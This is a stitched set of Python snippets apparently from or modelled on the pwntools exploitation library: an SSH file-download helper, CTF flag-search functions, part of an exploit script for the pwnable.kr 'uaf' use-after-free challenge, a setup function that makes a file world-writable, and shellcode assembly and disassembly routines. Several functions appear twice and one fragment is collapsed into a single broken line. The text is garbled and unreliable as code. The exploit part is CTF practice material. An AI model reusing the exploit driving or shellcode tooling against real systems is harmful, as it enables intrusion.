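def _download_raw(self, remote, local):
    """Fetch the remote file *remote* into the local path *local*.

    The remote path is base64-encoded here and decoded again on the
    remote side (``"$(echo ...|base64 -d)"``), so the remote shell never
    sees the raw path or any metacharacters in it.  SFTP is used when the
    connection supports it; otherwise the file is streamed through ``cat``
    and written locally.  Progress is reported via pwn.log unless
    ``self.silent`` is set.

    Args:
        remote: path of the file on the remote host.
        local: path the data is written to on this machine.
    """
    self._initialize_sftp()
    # Ask the remote side for the size first; the first whitespace-separated
    # field of the wc output is the byte count.
    total, _ = self.run_simple('wc -c "$(echo %s|base64 -d)"' % pwn.b64(remote))
    total = pwn.size(int(total.split()[0]))
    if not self.silent:
        pwn.log.waitfor('Downloading %s' % remote)

    def update(has, _total):
        # Progress callback.  The second argument is whatever the caller
        # (sftp or the loop below) passes; the size from wc is used instead.
        if not self.silent:
            pwn.log.status("%s/%s" % (pwn.size(has), total))

    if self._supports_sftp:
        self._sftp.get(remote, local, update)
    else:
        # Fallback path: stream through cat.  Chunks are collected in a list
        # and joined once rather than concatenated repeatedly, which is
        # quadratic for large files.
        chunks = []
        received = 0
        s = self.run('cat "$(echo %s|base64 -d)"' % pwn.b64(remote), silent=True)
        while s.connected():
            update(received, 0)
            chunk = s.recv()
            chunks.append(chunk)
            received += len(chunk)
        pwn.write(local, ''.join(chunks))
    if not self.silent:
        pwn.log.succeeded()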
def FlagFinder(cible, flag):  # {{{
    """Search the file *cible* for the regex *flag* and save any hit.

    Every match is logged with pwn.success and written to ``flag.txt``;
    with several matches each write replaces the previous one, so only the
    last match survives in the file.
    """
    # NOTE(review): str() on a bytes object under Python 3 yields its repr
    # ("b'...'"); the regex is matched against that text — confirm which
    # type pwn.read returns here.
    hits = re.findall(flag, str(pwn.read(cible)))
    if not hits:
        pwn.warn("Flag non trouvé")
        return
    for hit in hits:
        pwn.success("Yeah !!!! flag found: {result}\n".format(result=hit))
        pwn.warn("flag is now copied in flag.txt")
        pwn.write("flag.txt", hit)
def Exploit(fichier, pattern):
    """Scan the local file *fichier* for the regex *pattern* and save any hit.

    Matches are logged with pwn.success and written to ``flag.txt``; when
    there are several, each write replaces the previous one.
    """
    pwn.info("Opening file: {fichier}\n".format(fichier=fichier))
    contents = pwn.read(fichier)
    pwn.info("Searching for pattern: {flag}\n".format(flag=pattern))
    # NOTE(review): str() on a bytes object under Python 3 yields its repr
    # ("b'...'"); the regex is matched against that text — confirm which
    # type pwn.read returns here.
    hits = re.findall(pattern, str(contents))
    if not hits:
        pwn.warn("No flag for you my friend, check your regex")
        return
    for hit in hits:
        pwn.success("Yeah !!!! flag found: {result}\n".format(result=hit))
        pwn.warn("flag is now copied in flag.txt")
        pwn.write("flag.txt", hit)
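def Online(url, pattern, timeout=30):
    """Fetch *url* and scan the response body for the regex *pattern*.

    Args:
        url: address fetched with a fresh requests session (TLS certificate
            verification is left at the requests default, i.e. enabled).
        pattern: regular expression searched in the response body.
        timeout: seconds passed to ``requests.get`` so that a stalled
            server cannot hang the script indefinitely (the original call
            had no timeout).

    Matches are logged with pwn.success and written to ``flag.txt``; with
    several matches the last one wins.
    """
    pwn.info("Opening file: {fichier}\n".format(fichier=url))
    session = requests.session()
    body = session.get(url, timeout=timeout).content
    pwn.info("Search for pattern: {flag}\n".format(flag=pattern))
    # NOTE(review): .content is bytes; under Python 3 str() gives its repr
    # ("b'...'"), so the regex is matched against that text rather than a
    # decoded body.
    hits = re.findall(pattern, str(body))
    if not hits:
        pwn.warn("No flag for you my friend, check your regex")
        return
    for hit in hits:
        pwn.success("Yeah !!!! flag found: {result}\n".format(result=hit))
        pwn.warn("flag is now copied in flag.txt")
        pwn.write("flag.txt", hit)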
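def _download_raw(self, remote, local):
    """Copy the remote file *remote* to the local path *local*.

    The remote path goes through base64 on both ends (``"$(echo ...|base64
    -d)"``), so the remote shell only ever sees base64 text, not the raw
    path.  SFTP is preferred when the connection supports it; otherwise
    the file is streamed through ``cat``.  Unless ``self.silent`` is set,
    progress is shown through pwn.log.

    Args:
        remote: path of the file on the remote host.
        local: destination path on this machine.
    """
    self._initialize_sftp()
    # Byte count from the remote side; the first field of the wc output.
    total, _ = self.run_simple('wc -c "$(echo %s|base64 -d)"' % pwn.b64(remote))
    total = pwn.size(int(total.split()[0]))
    if not self.silent:
        pwn.log.waitfor('Downloading %s' % remote)

    def update(has, _total):
        # Progress callback shared by both transfer paths; the size
        # obtained from wc is reported, the second argument is ignored.
        if not self.silent:
            pwn.log.status("%s/%s" % (pwn.size(has), total))

    if self._supports_sftp:
        self._sftp.get(remote, local, update)
    else:
        # Stream through cat, accumulating chunks in a list; a single join
        # avoids the quadratic cost of repeated string concatenation.
        chunks = []
        received = 0
        s = self.run('cat "$(echo %s|base64 -d)"' % pwn.b64(remote), silent=True)
        while s.connected():
            update(received, 0)
            chunk = s.recv()
            chunks.append(chunk)
            received += len(chunk)
        pwn.write(local, ''.join(chunks))
    if not self.silent:
        pwn.log.succeeded()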
# payload, exe, payload_length and random_file are set earlier in the
# script (outside this excerpt).
pwn.debug(pwn.hexdump(payload))
# Commands handed to gdb when the GDB argument is given; the comments
# inside the script name the program locations of the breakpoints.
gdbscript = '''
# Before "delete m;"
break *0x00401082
# before "m->introduce();"
break *0x00400fe2
# before "new"
break *0x00401020
continue
'''
# Select the target from pwn.args: under gdb, as a plain local process,
# or over ssh.  NOTE(review): both local branches use the fixed path
# /tmp/payload inside a shared, world-writable directory.
if pwn.args.GDB:
    pwn.write('/tmp/payload', payload)
    p = pwn.gdb.debug([exe.path, str(payload_length), '/tmp/payload'], gdbscript=gdbscript)
elif pwn.args.LOCAL:
    pwn.write('/tmp/payload', payload)
    p = pwn.process([exe.path, str(payload_length), '/tmp/payload'])
else:
    io = pwn.ssh("uaf", "pwnable.kr", 2222, "guest")
    io.upload_data(payload, random_file)
    p = io.process(["./uaf", str(payload_length), random_file])
# Drive the program's menu: option 3 once, then option 2 twice, waiting
# for the menu prompt before each choice.
p.recvuntil('1. use\n2. after\n3. free\n')
p.sendline('3')
for x in range(0, 2):
    p.recvuntil('1. use\n2. after\n3. free\n')
    p.sendline('2')
def setup():
    """Write *script* to *filename* and make it executable.

    ``write``, ``filename`` and ``script`` come from the enclosing module.
    NOTE(review): the mode applied is rwx for owner, group and others
    (0777), so any local user can modify the file before it is run.
    """
    world_rwx = stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO
    write(filename, script)
    os.chmod(filename, world_rwx)
req = requests.get('https://api.github.com/gists/' + identifier) except Exception as e: print('Unable to download from Github.') print(str(e)) sys.exit(1) if req.status_code != 200: print('Unable to download from github, debug information follows') print(req.text) sys.exit(1) try: data = b64d(json.loads(req.text)['files']['data']['content']) except Exception as e: print('Unpacking data from Github failed.') print(str(e)) sys.exit(1) cipher = Encryption(password) decrypted = cipher.decrypt(data) try: if filename is None: sys.stdout.write(decrypted) else: write(filename, decrypted) except Exception as e: print("Unable to write data to file '%s'" % filename) print(str(e)) sys.exit(1)
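def _asm(target_arch, target_os, code_blocks, emit_asm=0, keep_tmp=False):
    """Assemble *code_blocks* for *target_arch*/*target_os* into raw bytes.

    Pipeline: cpp (with the os/arch include directories) -> assembler
    (nasm for i386/amd64, a bundled gnu as otherwise) -> objcopy (non-x86
    only, extracts the ``.shellcode`` section).  Every tool is invoked with
    an argument list, never through a shell, and all intermediate files
    live in a private ``mkdtemp`` directory.

    Args:
        target_arch: architecture name handled below; must not be None.
        target_os: 'linux', 'freebsd' or None (no os headers).
        code_blocks: list of assembly source fragments.
        emit_asm: 0 returns the assembled bytes; 1 returns the preprocessed
            assembly with an "Assemble with:" header; 2 returns the
            unpreprocessed source with the full tool-chain recipe.
        keep_tmp: leave the temporary working directory behind.

    Raises:
        Exception: missing architecture, missing assembler, unexpected cpp
            output, or relocations left in the non-x86 output.
    """
    # H is not referenced in this function; kept because importing the
    # helper module may matter elsewhere — TODO confirm and drop.
    import pwn.internal.shellcode_helper as H
    import os.path, tempfile, subprocess, string, shutil
    if target_arch is None:
        raise Exception('You need to set the architecture with context')
    tmpdir = tempfile.mkdtemp(prefix='pwn-asm-')

    def path(s):
        return os.path.join(tmpdir, s)

    try:
        # Random marker line: everything cpp emits before it (header
        # expansion) is discarded, only the part after it is assembled.
        magic = pwn.randoms(32, only=string.ascii_lowercase)
        code = []
        cpp = ['cpp', '-nostdinc', '-undef', '-w']
        if pwn.DEBUG:
            cpp += ['-D', 'DEBUG']
        if target_os is not None:
            include = os.path.join(pwn.installpath, 'pwn', 'include', target_os)
            cpp += ['-I', include]
            if target_os == 'linux':
                if os.path.isfile(os.path.join(include, target_arch + '.h')):
                    cpp += ['-I', os.path.join(include, 'diet')]
                    code += ['#include <%s.h>' % target_arch]
            elif target_os == 'freebsd':
                code += ['#include <common.h>']
        code += [magic]
        if target_arch not in ['i386', 'amd64']:
            code += ['.section .shellcode,"ax"']
        asm_extra = []
        # Per-architecture mode directives; thumb and mips/mipsel collapse
        # onto the 'arm' / 'mips' assembler after their directive is set.
        if target_arch == 'arm':
            code += ['.arm']
        elif target_arch == 'thumb':
            code += ['.thumb']
            target_arch = 'arm'
        elif target_arch == 'i386':
            code += ['bits 32']
        elif target_arch == 'amd64':
            code += ['bits 64']
        elif target_arch in ['mips', 'mipsel']:
            code += ['.set mips2']
            code += ['.set noreorder']
            if target_arch == 'mips':
                asm_extra += ['--EB']
            else:
                asm_extra += ['--EL']
            target_arch = 'mips'
        code += code_blocks
        code = '\n'.join(code)
        if target_arch in ['i386', 'amd64']:
            assembler = ['nasm', '-Ox'] + asm_extra
            objcopy = ['objcopy']
        else:
            assembler = [os.path.join(pwn.installpath, 'binutils', target_arch + '-as')] + asm_extra
            if not os.path.isfile(assembler[0]):
                raise Exception('Could not find the gnu assembler for this architecture: %s' % target_arch)
            objcopy = [os.path.join(pwn.installpath, 'binutils', 'promisc-objcopy')]
        objcopy += ['-j.shellcode', '-Obinary']
        if emit_asm == 2:
            output = []
            output += [
                "/*",
                " Assemble with:",
                " %s [input] -o [input].tmp1" % ' '.join(cpp),
                " sed -e '0,/^%s$/d' [input].tmp1 > [input].tmp2" % magic,
                " %s [input].tmp2 -o [input].tmp3" % ' '.join(assembler),
            ]
            if target_arch not in ['i386', 'amd64']:
                output += [" %s [input].tmp3 [output]" % ' '.join(objcopy)]
            output += ["*/", "", code]
            return '\n'.join(output)
        pwn.write(path('step1'), code)
        _run(cpp + [path('step1'), path('step2')])
        code = pwn.read(path('step2'))
        _code = code.split('\n' + magic + '\n')
        if len(_code) != 2:
            raise Exception("The output from cpp was weird:\n%s" % code)
        code = _code[1]
        if emit_asm == 1:
            output = []
            if target_arch in ['i386', 'amd64']:
                output += [
                    ';; Assemble with:',
                    ';; %s <input> -o <output>' % ' '.join(assembler),
                ]
            else:
                output += [
                    "/*",
                    " Assemble with:",
                    ' %s <input> -o <input>.tmp' % ' '.join(assembler),
                    ' %s [input].tmp [output]' % ' '.join(objcopy),
                    '*/',
                ]
            output += ["", code]
            return '\n'.join(output)
        pwn.write(path('step3'), code)
        _run(assembler + ['-o', path('step4'), path('step3')])
        if target_arch in ['i386', 'amd64']:
            # nasm already produced a flat binary.
            return pwn.read(path('step4'))
        # Sanity check for seeing if the output has relocations: more than
        # one line from readelf -r means a relocation section exists.
        relocs = subprocess.check_output(['readelf', '-r', path('step4')]).strip()
        if len(relocs.split('\n')) > 1:
            raise Exception('There were relocations in the shellcode:\n\n%s' % relocs)
        _run(objcopy + [path('step4'), path('step5')])
        return pwn.read(path('step5'))
    finally:
        if not keep_tmp:
            # Best-effort cleanup: swallow filesystem errors only, not
            # e.g. KeyboardInterrupt as the former bare except did.
            try:
                shutil.rmtree(tmpdir)
            except OSError:
                pass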
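def _disasm(data, target_arch, keep_tmp=False):
    """Disassemble the raw bytes *data* for *target_arch* and return the listing.

    The bytes are wrapped into an object file with objcopy (binary input,
    ``.data`` renamed to ``.text`` and flagged as code) and passed to
    ``objdump -d``; the text after the ``<.text>:`` marker is returned.
    x86 uses the system objcopy/objdump (Intel syntax); other
    architectures use the bundled ``promisc-*`` binutils.  Tools are
    invoked with argument lists, never a shell, inside a private
    ``mkdtemp`` directory.

    Args:
        data: machine code bytes to disassemble.
        target_arch: one of the architectures in the table below.
        keep_tmp: leave the temporary working directory behind.

    Raises:
        Exception: missing or unsupported architecture, or unexpected
            objdump output.
    """
    import os.path, tempfile, subprocess, shutil
    if target_arch is None:
        raise Exception('You need to set the architecture with context')
    # (bfd target name, bfd architecture) handed to objcopy -O / -B.
    bfd_targets = {
        'i386':    ('elf32-i386',        'i386'),
        'amd64':   ('elf64-x86-64',      'i386:x86-64'),
        'arm':     ('elf32-littlearm',   'arm'),
        'thumb':   ('elf32-littlearm',   'arm'),
        'mips':    ('elf32-bigmips',     'mips'),
        'mipsel':  ('elf32-littlemips',  'mipsel'),
        'alpha':   ('elf64-alpha',       'alpha'),
        'cris':    ('elf32-cris',        'cris'),
        'ia64':    ('elf64-ia64-little', 'ia64-elf64'),
        'm68k':    ('elf32-m68k',        'm68k'),
        'powerpc': ('elf32-powerpc',     'powerpc'),
        'vax':     ('elf32-vax',         'vax'),
    }
    if target_arch not in bfd_targets:
        # The if/elif chain this replaces fell through and later raised an
        # UnboundLocalError on bfdname; fail with a clear message instead.
        raise Exception('Unsupported architecture for disassembly: %s' % target_arch)
    bfdname, bfdarch = bfd_targets[target_arch]
    tmpdir = tempfile.mkdtemp(prefix='pwn-disasm-')

    def path(s):
        return os.path.join(tmpdir, s)

    try:
        if target_arch == 'thumb':
            # presumably the $t. symbol prefix makes objdump decode thumb —
            # confirm against the bundled binutils.
            extra = ['--prefix-symbol=$t.']
        else:
            extra = ['-w', '-N', '*']
        if target_arch in ['i386', 'amd64']:
            objcopy = ['objcopy']
            objdump = ['objdump', '-Mintel']
        else:
            bindir = os.path.join(pwn.installpath, 'binutils')
            objcopy = [os.path.join(bindir, 'promisc-objcopy')]
            objdump = [os.path.join(bindir, 'promisc-objdump')]
        objcopy += [
            '-I', 'binary', '-O', bfdname, '-B', bfdarch,
            '--set-section-flags', '.data=code',
            '--rename-section', '.data=.text',
        ]
        objdump += ['-d']
        pwn.write(path('step1'), data)
        _run(objcopy + extra + [path('step1'), path('step2')])
        listing = subprocess.check_output(objdump + [path('step2')])
        parts = listing.split('<.text>:\n')
        if len(parts) != 2:
            raise Exception('Something went wrong with objdump:\n\n%s' % listing)
        return parts[1].strip('\n')
    finally:
        if not keep_tmp:
            # Best-effort cleanup: swallow filesystem errors only.
            try:
                shutil.rmtree(tmpdir)
            except OSError:
                pass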
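def _asm(target_arch, target_os, code_blocks, emit_asm=0, keep_tmp=False):
    """Assemble *code_blocks* for *target_arch*/*target_os* into raw bytes.

    Steps: cpp (os/arch include directories) -> assembler (nasm on
    i386/amd64, the bundled gnu as elsewhere) -> objcopy (non-x86 only,
    extracting the ``.shellcode`` section).  All tools run from argument
    lists without a shell; intermediate files live in a private
    ``mkdtemp`` directory.

    Args:
        target_arch: architecture name handled below; must not be None.
        target_os: 'linux', 'freebsd' or None (no os headers).
        code_blocks: list of assembly source fragments.
        emit_asm: 0 returns assembled bytes; 1 returns the preprocessed
            assembly with an "Assemble with:" header; 2 returns the
            unpreprocessed source with the complete tool-chain recipe.
        keep_tmp: leave the temporary working directory behind.

    Raises:
        Exception: missing architecture, missing assembler, unexpected cpp
            output, or relocations left in the non-x86 output.
    """
    # H is unused below; retained in case importing the helper module has
    # side effects the rest of the package relies on — TODO confirm.
    import pwn.internal.shellcode_helper as H
    import os.path, tempfile, subprocess, string, shutil
    if target_arch is None:
        raise Exception('You need to set the architecture with context')
    tmpdir = tempfile.mkdtemp(prefix='pwn-asm-')

    def path(s):
        return os.path.join(tmpdir, s)

    try:
        # Random marker: output from cpp before this line is header noise
        # and is dropped; the text after it is what gets assembled.
        magic = pwn.randoms(32, only=string.ascii_lowercase)
        code = []
        cpp = ['cpp', '-nostdinc', '-undef', '-w']
        if pwn.DEBUG:
            cpp += ['-D', 'DEBUG']
        if target_os is not None:
            include = os.path.join(pwn.installpath, 'pwn', 'include', target_os)
            cpp += ['-I', include]
            if target_os == 'linux':
                if os.path.isfile(os.path.join(include, target_arch + '.h')):
                    cpp += ['-I', os.path.join(include, 'diet')]
                    code += ['#include <%s.h>' % target_arch]
            elif target_os == 'freebsd':
                code += ['#include <common.h>']
        code += [magic]
        if target_arch not in ['i386', 'amd64']:
            code += ['.section .shellcode,"ax"']
        asm_extra = []
        # Mode directives per architecture; thumb and mips/mipsel are then
        # assembled with the 'arm' / 'mips' assembler respectively.
        if target_arch == 'arm':
            code += ['.arm']
        elif target_arch == 'thumb':
            code += ['.thumb']
            target_arch = 'arm'
        elif target_arch == 'i386':
            code += ['bits 32']
        elif target_arch == 'amd64':
            code += ['bits 64']
        elif target_arch in ['mips', 'mipsel']:
            code += ['.set mips2']
            code += ['.set noreorder']
            if target_arch == 'mips':
                asm_extra += ['--EB']
            else:
                asm_extra += ['--EL']
            target_arch = 'mips'
        code += code_blocks
        code = '\n'.join(code)
        if target_arch in ['i386', 'amd64']:
            assembler = ['nasm', '-Ox'] + asm_extra
            objcopy = ['objcopy']
        else:
            assembler = [os.path.join(pwn.installpath, 'binutils', target_arch + '-as')] + asm_extra
            if not os.path.isfile(assembler[0]):
                raise Exception('Could not find the gnu assembler for this architecture: %s' % target_arch)
            objcopy = [os.path.join(pwn.installpath, 'binutils', 'promisc-objcopy')]
        objcopy += ['-j.shellcode', '-Obinary']
        if emit_asm == 2:
            output = []
            output += [
                "/*",
                " Assemble with:",
                " %s [input] -o [input].tmp1" % ' '.join(cpp),
                " sed -e '0,/^%s$/d' [input].tmp1 > [input].tmp2" % magic,
                " %s [input].tmp2 -o [input].tmp3" % ' '.join(assembler),
            ]
            if target_arch not in ['i386', 'amd64']:
                output += [" %s [input].tmp3 [output]" % ' '.join(objcopy)]
            output += ["*/", "", code]
            return '\n'.join(output)
        pwn.write(path('step1'), code)
        _run(cpp + [path('step1'), path('step2')])
        code = pwn.read(path('step2'))
        _code = code.split('\n' + magic + '\n')
        if len(_code) != 2:
            raise Exception("The output from cpp was weird:\n%s" % code)
        code = _code[1]
        if emit_asm == 1:
            output = []
            if target_arch in ['i386', 'amd64']:
                output += [
                    ';; Assemble with:',
                    ';; %s <input> -o <output>' % ' '.join(assembler),
                ]
            else:
                output += [
                    "/*",
                    " Assemble with:",
                    ' %s <input> -o <input>.tmp' % ' '.join(assembler),
                    ' %s [input].tmp [output]' % ' '.join(objcopy),
                    '*/',
                ]
            output += ["", code]
            return '\n'.join(output)
        pwn.write(path('step3'), code)
        _run(assembler + ['-o', path('step4'), path('step3')])
        if target_arch in ['i386', 'amd64']:
            # nasm emits a flat binary directly.
            return pwn.read(path('step4'))
        # Sanity check for seeing if the output has relocations: readelf -r
        # printing more than one line means a relocation section exists.
        relocs = subprocess.check_output(['readelf', '-r', path('step4')]).strip()
        if len(relocs.split('\n')) > 1:
            raise Exception('There were relocations in the shellcode:\n\n%s' % relocs)
        _run(objcopy + [path('step4'), path('step5')])
        return pwn.read(path('step5'))
    finally:
        if not keep_tmp:
            # Best-effort cleanup; only filesystem errors are swallowed,
            # unlike the former bare except.
            try:
                shutil.rmtree(tmpdir)
            except OSError:
                pass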
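def _disasm(data, target_arch, keep_tmp=False):
    """Return the objdump listing of the raw bytes *data* for *target_arch*.

    objcopy wraps the bytes into an object file (binary input, ``.data``
    renamed to ``.text`` and flagged as code); ``objdump -d`` then
    disassembles it and the text following ``<.text>:`` is returned.
    i386/amd64 use the system objcopy/objdump with Intel syntax, every
    other architecture the bundled ``promisc-*`` binutils.  Tools run from
    argument lists without a shell, inside a private ``mkdtemp`` directory.

    Args:
        data: machine code bytes to disassemble.
        target_arch: one of the architectures in the table below.
        keep_tmp: leave the temporary working directory behind.

    Raises:
        Exception: missing or unsupported architecture, or unexpected
            objdump output.
    """
    import os.path, tempfile, subprocess, shutil
    if target_arch is None:
        raise Exception('You need to set the architecture with context')
    # (bfd target name, bfd architecture) for objcopy -O / -B.
    bfd_targets = {
        'i386':    ('elf32-i386',        'i386'),
        'amd64':   ('elf64-x86-64',      'i386:x86-64'),
        'arm':     ('elf32-littlearm',   'arm'),
        'thumb':   ('elf32-littlearm',   'arm'),
        'mips':    ('elf32-bigmips',     'mips'),
        'mipsel':  ('elf32-littlemips',  'mipsel'),
        'alpha':   ('elf64-alpha',       'alpha'),
        'cris':    ('elf32-cris',        'cris'),
        'ia64':    ('elf64-ia64-little', 'ia64-elf64'),
        'm68k':    ('elf32-m68k',        'm68k'),
        'powerpc': ('elf32-powerpc',     'powerpc'),
        'vax':     ('elf32-vax',         'vax'),
    }
    if target_arch not in bfd_targets:
        # The original elif chain had no else and later failed with an
        # UnboundLocalError on bfdname; report the problem directly.
        raise Exception('Unsupported architecture for disassembly: %s' % target_arch)
    bfdname, bfdarch = bfd_targets[target_arch]
    tmpdir = tempfile.mkdtemp(prefix='pwn-disasm-')

    def path(s):
        return os.path.join(tmpdir, s)

    try:
        if target_arch == 'thumb':
            # presumably the $t. prefix marks the symbol as thumb code for
            # objdump — confirm against the bundled binutils.
            extra = ['--prefix-symbol=$t.']
        else:
            extra = ['-w', '-N', '*']
        if target_arch in ['i386', 'amd64']:
            objcopy = ['objcopy']
            objdump = ['objdump', '-Mintel']
        else:
            bindir = os.path.join(pwn.installpath, 'binutils')
            objcopy = [os.path.join(bindir, 'promisc-objcopy')]
            objdump = [os.path.join(bindir, 'promisc-objdump')]
        objcopy += [
            '-I', 'binary', '-O', bfdname, '-B', bfdarch,
            '--set-section-flags', '.data=code',
            '--rename-section', '.data=.text',
        ]
        objdump += ['-d']
        pwn.write(path('step1'), data)
        _run(objcopy + extra + [path('step1'), path('step2')])
        listing = subprocess.check_output(objdump + [path('step2')])
        parts = listing.split('<.text>:\n')
        if len(parts) != 2:
            raise Exception('Something went wrong with objdump:\n\n%s' % listing)
        return parts[1].strip('\n')
    finally:
        if not keep_tmp:
            # Best-effort cleanup: only filesystem errors are swallowed.
            try:
                shutil.rmtree(tmpdir)
            except OSError:
                pass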